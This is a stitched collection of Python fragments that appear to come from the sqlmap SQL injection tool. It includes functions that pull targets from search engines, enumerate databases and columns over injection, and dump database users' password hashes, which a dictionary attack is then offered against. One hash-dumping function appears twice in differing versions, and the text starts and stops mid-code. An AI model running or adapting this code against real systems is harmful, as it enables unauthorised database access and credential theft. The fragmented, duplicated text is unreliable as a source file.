target by fofa: %s" % (conf['target_fofa'])) urls = search_api(conf['target_fofa']) for _url in urls: if _url: self._load_target(_url) elif 'target_fofa_today_poc' in conf.keys(): logger.sysinfo("Loading target by fofa today poc: %s" % (conf['target_fofa_today_poc'])) obj = search_api(conf['target_fofa_today_poc']) for _url, _server in obj: if _url: self._load_target(_url, _server) elif 'target_google' in conf.keys(): logger.sysinfo("Loading target by google: %s" % (conf['target_google'])) urls = search_api(conf['target_google']) for _url in urls: if _url: self._load_target(_url) elif 'target_github' in conf.keys(): logger.sysinfo("Loading target by github: %s" % (conf['target_github'])) urls = search_api(conf['target_github']) else: sys.exit( logger.error("Can't load any targets! Please check input.")) if len(self.targets) == 0: sys.exit( logger.error("Can't load any targets! Please check input."))
def getPasswordHashes(self): infoMsg = "fetching database users password hashes" rootQuery = queries[Backend.getIdentifiedDbms()].passwords if conf.user == CURRENT_USER: infoMsg += " for current user" conf.user = self.getCurrentUser() logger.info(infoMsg) if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.user = conf.user.upper() if conf.user: users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] else: users = [] users = [_ for _ in users if _] if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): query = rootQuery.inband.query2 else: query = rootQuery.inband.query condition = rootQuery.inband.condition if conf.user: query += " WHERE " query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True retVal = pivotDumpTable( "(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) if retVal: for user, password in filterPairValues( _zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) getCurrentThreadData().disableStdOut = False else: values = inject.getValue(query, blind=False, time=False) if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): values = inject.getValue(query.replace( "master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) elif Backend.isDbms( DBMS.MYSQL) and (isNoneValue(values) or all( len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)): values = inject.getValue(query.replace( "authentication_string", "password"), blind=False, time=False) for user, password in filterPairValues(values): if not user or user == " ": continue password = parsePasswordHash(password) if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) if not kb.data.cachedUsersPasswords and isInferenceAvailable( ) and not conf.direct: fallback = False if not len(users): users = self.getUsers() if Backend.isDbms(DBMS.MYSQL): for user in users: parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True query = rootQuery.inband.query retVal = pivotDumpTable( "(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True) if retVal: for user, password in filterPairValues( _zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): password = "******" % encodeHex(password, binary=False).upper() if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) getCurrentThreadData().disableStdOut = False else: retrievedUsers = set() for user in users: user = unArrayizeValue(user) if user in retrievedUsers: continue if Backend.isDbms(DBMS.INFORMIX): count = 1 else: infoMsg = "fetching number of password hashes " infoMsg += "for user '%s'" % user logger.info(infoMsg) if Backend.isDbms( DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): query = rootQuery.blind.count2 % user else: query = rootQuery.blind.count % user count = inject.getValue( query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): if Backend.isDbms(DBMS.MSSQL): fallback = True count = inject.getValue( query.replace( "master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) elif Backend.isDbms(DBMS.MYSQL): fallback = True count = inject.getValue( query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) continue infoMsg = "fetching password hashes for user '%s'" % user logger.info(infoMsg) passwords = [] plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.isDbms(DBMS.MSSQL): if Backend.isVersionWithin(("2005", "2008")): query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) if fallback: query = query.replace( "master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.query % (user, ) elif Backend.isDbms(DBMS.HSQLDB): query = rootQuery.blind.query % (index, user) else: query = rootQuery.blind.query % (user, index) if Backend.isDbms(DBMS.MYSQL): if fallback: query = query.replace("authentication_string", "password") password = unArrayizeValue( inject.getValue(query, union=False, error=False)) password = parsePasswordHash(password) passwords.append(password) if passwords: kb.data.cachedUsersPasswords[user] = passwords else: warnMsg = "unable to retrieve the password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersPasswords: errMsg = "unable to retrieve the password hashes for the " errMsg += "database users" logger.error(errMsg) else: for user in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = list( set(kb.data.cachedUsersPasswords[user])) storeHashesToFile(kb.data.cachedUsersPasswords) message = "do you want to perform a dictionary-based attack " message += "against retrieved password hashes? [Y/n/q]" choice = readInput(message, default='Y').upper() if choice == 'N': pass elif choice == 'Q': raise SqlmapUserQuitException else: attackCachedUsersPasswords() return kb.data.cachedUsersPasswords
def getDbs(self): if len(kb.data.cachedDbs) > 0: return kb.data.cachedDbs infoMsg = None if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: warnMsg = "information_schema not available, " warnMsg += "back-end DBMS is MySQL < 5. database " warnMsg += "names will be fetched from 'mysql' database" logger.warn(warnMsg) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL): warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms( ) warnMsg += "for enumeration as the counterpart to database " warnMsg += "names on other DBMSes" logger.warn(warnMsg) infoMsg = "fetching database (schema) names" else: infoMsg = "fetching database names" if infoMsg: logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].dbs if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: query = rootQuery.inband.query2 else: query = rootQuery.inband.query values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): kb.data.cachedDbs = arrayizeValue(values) if not kb.data.cachedDbs and isInferenceAvailable( ) and not conf.direct: infoMsg = "fetching number of databases" logger.info(infoMsg) if Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: query = rootQuery.blind.count2 else: query = rootQuery.blind.count count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the number of databases" logger.error(errMsg) else: plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.isDbms(DBMS.SYBASE): query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ") elif Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index db = unArrayizeValue( inject.getValue(query, union=False, error=False)) if db: kb.data.cachedDbs.append( safeSQLIdentificatorNaming(db)) if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL): if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: blinds = (False, True) else: blinds = (True, ) for blind in blinds: count = 0 kb.data.cachedDbs = [] while True: query = rootQuery.inband.query2 % count value = unArrayizeValue(inject.getValue(query, blind=blind)) if not (value or "").strip(): break else: kb.data.cachedDbs.append(value) count += 1 if kb.data.cachedDbs: break if not kb.data.cachedDbs: infoMsg = "falling back to current database" logger.info(infoMsg) self.getCurrentDb() if kb.data.currentDb: kb.data.cachedDbs = [kb.data.currentDb] else: errMsg = "unable to retrieve the database names" raise SqlmapNoneDataException(errMsg) else: kb.data.cachedDbs.sort() if kb.data.cachedDbs: kb.data.cachedDbs = filter( None, list(set(flattenValue(kb.data.cachedDbs)))) return kb.data.cachedDbs
if numThreads > 1: logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else "")) try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)") if forwardException: raise except (SqlmapConnectionException, SqlmapValueException), ex: print kb.threadException = True logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) except: from lib.core.common import unhandledExceptionMessage print kb.threadException = True errMsg = unhandledExceptionMessage() logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) traceback.print_exc() finally: kb.multiThreadMode = False kb.bruteMode = False kb.threadContinue = True kb.threadException = False
def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: if conf.db is None: warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) columns" logger.warn(warnMsg) conf.db = self.getCurrentDb() if not conf.db: errMsg = "unable to retrieve the current " errMsg += "database name" raise SqlmapNoneDataException(errMsg) elif conf.db is not None: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) conf.db = safeSQLIdentificatorNaming(conf.db) if conf.col: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.col = conf.col.upper() colList = conf.col.split(',') else: colList = [] if conf.excludeCol: colList = [ _ for _ in colList if _ not in conf.excludeCol.split(',') ] for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) colList = filter(None, colList) if conf.tbl: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(",") else: self.getTables() if len(kb.data.cachedTables) > 0: if conf.db in kb.data.cachedTables: tblList = kb.data.cachedTables[conf.db] else: tblList = kb.data.cachedTables.values() if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] tblList = list(tblList) else: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) raise SqlmapNoneDataException(errMsg) tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList)) if bruteForce is None: if Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" logger.error(errMsg) bruteForce = True elif Backend.isDbms(DBMS.ACCESS): errMsg = "cannot retrieve column names, " errMsg += "back-end DBMS is Access" logger.error(errMsg) bruteForce = True if bruteForce: resumeAvailable = False for tbl in tblList: for db, table, colName, colType in kb.brute.columns: if db == conf.db and table == tbl: resumeAvailable = True break if resumeAvailable and not conf.freshQueries or colList: columns = {} for column in colList: columns[column] = None for tbl in tblList: for db, table, colName, colType in kb.brute.columns: if db == conf.db and table == tbl: columns[colName] = colType if conf.db in kb.data.cachedColumns: kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming( tbl, True)] = columns else: kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)] = { safeSQLIdentificatorNaming(tbl, True): columns } return kb.data.cachedColumns message = "do you want to use common column existence check? %s" % ( "[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, ) else "[y/N/q]") test = readInput(message, default="Y" if "Y" in message else "N") if test[0] in ("n", "N"): return elif test[0] in ("q", "Q"): raise SqlmapUserQuitException else: return columnExists(paths.COMMON_COLUMNS) rootQuery = queries[Backend.getIdentifiedDbms()].columns condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: for tbl in tblList: if conf.db is not None and len(kb.data.cachedColumns) > 0 \ and conf.db in kb.data.cachedColumns and tbl in \ kb.data.cachedColumns[conf.db]: infoMsg = "fetched tables' columns on " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) return {conf.db: kb.data.cachedColumns[conf.db]} infoMsg = "fetching columns " condQuery = "" if len(colList) > 0: if colTuple: _, colCondParam = colTuple infoMsg += "like '%s' " % ", ".join( unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join( unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join( condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.inband.query % ( unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.inband.query % ( unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.inband.query % ( conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.inband.query % tbl values = inject.getValue(query, blind=False, time=False) if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] while True: query = rootQuery.inband.query2 % (conf.db, tbl, index) value = unArrayizeValue( inject.getValue(query, blind=False, time=False)) if isNoneValue(value) or value == " ": break else: values.append((value, )) index += 1 if Backend.isDbms(DBMS.SQLITE): parseSqliteTableSchema(unArrayizeValue(values)) elif not isNoneValue(values): table = {} columns = {} for columnData in values: if not isNoneValue(columnData): name = safeSQLIdentificatorNaming(columnData[0]) if name: if conf.getComments: _ = queries[Backend.getIdentifiedDbms( )].column_comment if hasattr(_, "query"): if Backend.getIdentifiedDbms() in ( DBMS.ORACLE, DBMS.DB2): query = _.query % ( unsafeSQLIdentificatorNaming( conf.db.upper()), unsafeSQLIdentificatorNaming( tbl.upper()), unsafeSQLIdentificatorNaming( name.upper())) else: query = _.query % ( unsafeSQLIdentificatorNaming( conf.db), unsafeSQLIdentificatorNaming( tbl), unsafeSQLIdentificatorNaming( name)) comment = unArrayizeValue( inject.getValue(query, blind=False, time=False)) else: warnMsg = "on %s it is not " % Backend.getIdentifiedDbms( ) warnMsg += "possible to get column comments" singleTimeWarnMessage(warnMsg) if len(columnData) == 1: columns[name] = None else: if Backend.isDbms(DBMS.FIREBIRD): columnData[1] = FIREBIRD_TYPES.get( columnData[1], columnData[1]) columns[name] = columnData[1] if conf.db in kb.data.cachedColumns: kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming( tbl, True)] = columns else: table[safeSQLIdentificatorNaming(tbl, True)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)] = table elif isInferenceAvailable() and not conf.direct: for tbl in tblList: if conf.db is not None and len(kb.data.cachedColumns) > 0 \ and conf.db in kb.data.cachedColumns and tbl in \ kb.data.cachedColumns[conf.db]: infoMsg = "fetched tables' columns on " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) return {conf.db: kb.data.cachedColumns[conf.db]} infoMsg = "fetching columns " condQuery = "" if len(colList) > 0: if colTuple: _, colCondParam = colTuple infoMsg += "like '%s' " % ", ".join( unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join( unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join( condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.count % ( unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.count % ( unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.blind.count % (conf.db, conf.db, \ unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.count % (tbl) query += condQuery elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % tbl value = unArrayizeValue( inject.getValue(query, union=False, error=False)) parseSqliteTableSchema(value) return kb.data.cachedColumns count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) table = {} columns = {} if not isNumPosStrValue(count): if Backend.isDbms(DBMS.MSSQL): count, index, values = 0, 1, [] while True: query = rootQuery.blind.query3 % (conf.db, tbl, index) value = unArrayizeValue( inject.getValue(query, union=False, error=False)) if isNoneValue(value) or value == " ": break else: columns[safeSQLIdentificatorNaming( value)] = None index += 1 if not columns: errMsg = "unable to retrieve the %scolumns " % ( "number of " if not Backend.isDbms(DBMS.MSSQL) else "") errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.error(errMsg) continue for index in getLimitRange(count): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): query = rootQuery.blind.query % ( unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % ( unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery field = None elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.blind.query.replace( "'%s'", "'%s'" % unsafeSQLIdentificatorNaming(tbl).split(".")[-1] ).replace("%s", conf.db).replace("%d", str(index)) query += condQuery.replace("[DB]", conf.db) field = condition.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (tbl) query += condQuery field = None query = agent.limitQuery(index, query, field, field) column = unArrayizeValue( inject.getValue(query, union=False, error=False)) if not isNoneValue(column): if conf.getComments: _ = queries[ Backend.getIdentifiedDbms()].column_comment if hasattr(_, "query"): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = _.query % ( unsafeSQLIdentificatorNaming( conf.db.upper()), unsafeSQLIdentificatorNaming( tbl.upper()), unsafeSQLIdentificatorNaming( column.upper())) else: query = _.query % ( unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) comment = unArrayizeValue( inject.getValue(query, union=False, error=False)) else: warnMsg = "on %s it is not " % Backend.getIdentifiedDbms( ) warnMsg += "possible to get column comments" singleTimeWarnMessage(warnMsg) if not onlyColNames: if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): query = rootQuery.blind.query2 % ( unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db)) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query2 % ( unsafeSQLIdentificatorNaming( tbl.upper()), column, unsafeSQLIdentificatorNaming( conf.db.upper())) elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.blind.query2 % ( conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split( ".")[-1]) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query2 % (tbl, column) colType = unArrayizeValue( inject.getValue(query, union=False, error=False)) if Backend.isDbms(DBMS.FIREBIRD): colType = FIREBIRD_TYPES.get(colType, colType) column = safeSQLIdentificatorNaming(column) columns[column] = colType else: column = safeSQLIdentificatorNaming(column) columns[column] = None if columns: if conf.db in kb.data.cachedColumns: kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming( tbl, True)] = columns else: table[safeSQLIdentificatorNaming(tbl, True)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)] = table if not kb.data.cachedColumns: warnMsg = "unable to retrieve column names for " warnMsg += ("table '%s' " % unsafeSQLIdentificatorNaming(unArrayizeValue(tblList)) ) if len(tblList) == 1 else "any table " warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.warn(warnMsg) if bruteForce is None: return self.getColumns(onlyColNames=onlyColNames, colTuple=colTuple, bruteForce=True) return kb.data.cachedColumns
def getPasswordHashes(self): infoMsg = "fetching database users password hashes" rootQuery = queries[Backend.getIdentifiedDbms()].passwords if conf.user == "CU": infoMsg += " for current user" conf.user = self.getCurrentUser() logger.info(infoMsg) if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.user = conf.user.upper() if conf.user: users = conf.user.split(",") if Backend.isDbms(DBMS.MYSQL): for user in users: parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] else: users = [] users = filter(None, users) if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): query = rootQuery.inband.query2 else: query = rootQuery.inband.query condition = rootQuery.inband.condition if conf.user: query += " WHERE " query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) if Backend.isDbms(DBMS.SYBASE): randStr = randomStr() getCurrentThreadData().disableStdOut = True retVal = pivotDumpTable( "(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) if retVal: for user, password in filterPairValues( zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) getCurrentThreadData().disableStdOut = False else: values = inject.getValue(query, blind=False, time=False) for user, password in filterPairValues(values): if not user or user == " ": continue password = parsePasswordHash(password) if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) if not kb.data.cachedUsersPasswords and isInferenceAvailable( ) and not conf.direct: if not len(users): users = self.getUsers() if Backend.isDbms(DBMS.MYSQL): for user in users: parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True randStr = randomStr() query = rootQuery.inband.query retVal = pivotDumpTable( "(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) if retVal: for user, password in filterPairValues( zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): password = "******" % hexencode(password).upper() if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) getCurrentThreadData().disableStdOut = False else: retrievedUsers = set() for user in users: user = unArrayizeValue(user) if user in retrievedUsers: continue infoMsg = "fetching number of password hashes " infoMsg += "for user '%s'" % user logger.info(infoMsg) if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): query = rootQuery.blind.count2 % user else: query = rootQuery.blind.count % user count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) continue infoMsg = "fetching password hashes for user '%s'" % user logger.info(infoMsg) passwords = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.isDbms(DBMS.MSSQL): if Backend.isVersionWithin(("2005", "2008")): query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) else: query = rootQuery.blind.query % (user, index) password = unArrayizeValue( inject.getValue(query, union=False, error=False)) password = parsePasswordHash(password) passwords.append(password) if passwords: kb.data.cachedUsersPasswords[user] = passwords else: warnMsg = "unable to retrieve the password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersPasswords: errMsg = "unable to retrieve the password hashes for the " errMsg += "database users (most probably because the session " errMsg += "user has no read privileges over the relevant " errMsg += "system database table)" logger.error(errMsg) else: for user in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = list( set(kb.data.cachedUsersPasswords[user])) storeHashesToFile(kb.data.cachedUsersPasswords) message = "do you want to perform a dictionary-based attack " message += "against retrieved password hashes? [Y/n/q]" test = readInput(message, default="Y") if test[0] in ("n", "N"): pass elif test[0] in ("q", "Q"): raise SqlmapUserQuitException else: attackCachedUsersPasswords() return kb.data.cachedUsersPasswords
def main(): """ Main function of sqlmap when running from command line. """ try: checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) if hasattr(conf, "api"): # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) init() if conf.profile: profile() elif conf.smokeTest: smokeTest() elif conf.liveTest: liveTest() else: try: start() except thread.error as ex: if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: errMsg = "user quit" try: logger.error(errMsg) except KeyboardInterrupt: pass except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) try: logger.critical(errMsg) except KeyboardInterrupt: pass raise SystemExit except KeyboardInterrupt: print errMsg = "user aborted" try: logger.error(errMsg) except KeyboardInterrupt: pass except EOFError: print errMsg = "exit" try: logger.error(errMsg) except KeyboardInterrupt: pass except SystemExit: pass except: print errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() try: if not checkIntegrity(): errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print dataToStdout(excMsg) raise SystemExit elif "MemoryError" in excMsg: errMsg = "memory exhaustion detected" logger.error(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): errMsg = "no space left on output device" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.error(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.error(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.error(errMsg) raise SystemExit elif 